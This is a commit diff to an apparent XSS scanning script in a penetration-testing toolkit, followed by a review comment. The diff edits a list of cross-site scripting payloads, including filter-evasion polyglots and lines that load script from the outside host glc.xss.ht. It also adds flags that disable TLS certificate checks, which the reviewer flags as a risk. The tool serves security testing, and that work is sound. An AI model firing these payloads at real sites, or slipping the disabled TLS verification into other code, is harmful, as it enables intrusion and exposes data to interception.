Projects STRLCPY pentest-tools Commits 823bfd82
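--- a/xss.py
+++ b/xss.py
@@ -209,7 +209,7 @@
 if not os.path.isfile(_phantom):
  parser.error( 'phantomjs not found!' )
 # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
-_phantom_cmd = _phantom + ' --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
+_phantom_cmd = _phantom + ' --ignore-ssl-errors=true --ssl-protocol=any --load-images=false ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
 # _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js'
 # print( _phantom_cmd )
 
@@ -296,7 +296,6 @@
 # source: https://twitter.com/brutelogic/status/1138805808328839170
 if not n_payloads:
  t_payloads = [
- '\'"--><sVg onload=prompt(1)>',
  '\'"--><a autofocus onfocus=prompt(1) href=?>.',
  '\'"--></sCrIpt><sCRIpt>prompt(1)</SCript>',
  '\'"--><svG><scRIpt href=data:,prompt(1) />',
@@ -305,8 +304,10 @@
  "'\")];*/prompt(1);/*",
  '" onload=prompt(1)>',
  '\'"--><SCripT src="//glc.xss.ht">',
+ '\'"--><SCripT src=https://glc.xss.ht>',
  '\'"--><sCRipt src=javascript:[1].find(prompt)>',
- "'\"--><x v-on=_c.constructor('prompt(1)')()>",
+ "'\"--><sVg/OnLuFy=\"X=y\"oNloaD=;1^confirm(1)>/``^1//",
+ "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
  ]
 n_payloads = len(t_payloads)
 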
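Review bot: The new `_phantom_cmd` line hard-codes `--ignore-ssl-errors=true --ssl-protocol=any`, so every run skips certificate validation and accepts any protocol version. The headless browser then cannot tell the intended host from an interposed one, and a reported finding may rest on content the target never served. Anything the script forwards to PhantomJS (cookies or auth headers, if it passes any; that part is outside the visible lines) would also go to an unverified peer. I would keep the strict command as the default and add the two flags only when the operator asks for it through an explicit option on the existing `parser`, along the lines of `_tls_opts = ' --ignore-ssl-errors=true --ssl-protocol=any' if <opt-in option> else ''`. The line should also carry a comment such as `# TLS verification disabled on request: responses are not authenticated`.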